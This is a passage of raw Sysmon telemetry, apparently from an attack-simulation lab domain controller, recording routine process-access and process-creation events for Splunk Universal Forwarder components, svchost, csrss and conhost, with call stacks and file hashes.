DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009274Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:44.609{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009273Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:44.609{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9324-6005-C904-00000000A301}4520C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009272Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:44.609{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9324-6005-C904-00000000A301}4520C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009271Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:44.610{59A5CD1D-9324-6005-C904-00000000A301}4520C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009297Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:45.640{59A5CD1D-9325-6005-CA04-00000000A301}31802188C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009296Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:45.515{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9325-6005-CA04-00000000A301}3180C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009295Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:45.515{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009294Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:45.515{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009293Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:45.515{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009292Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:45.515{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009291Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:45.515{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009290Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:45.515{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009289Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:45.515{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009288Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:45.515{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009287Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:45.515{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009286Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:45.515{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9325-6005-CA04-00000000A301}3180C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009285Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:45.515{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9325-6005-CA04-00000000A301}3180C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009284Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:45.516{59A5CD1D-9325-6005-CA04-00000000A301}3180C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009310Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:46.187{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9326-6005-CB04-00000000A301}2488C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009309Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:46.187{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009308Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:46.187{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009307Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:46.187{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009306Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:46.187{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009305Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:46.187{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009304Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:46.187{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009303Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:46.187{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009302Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 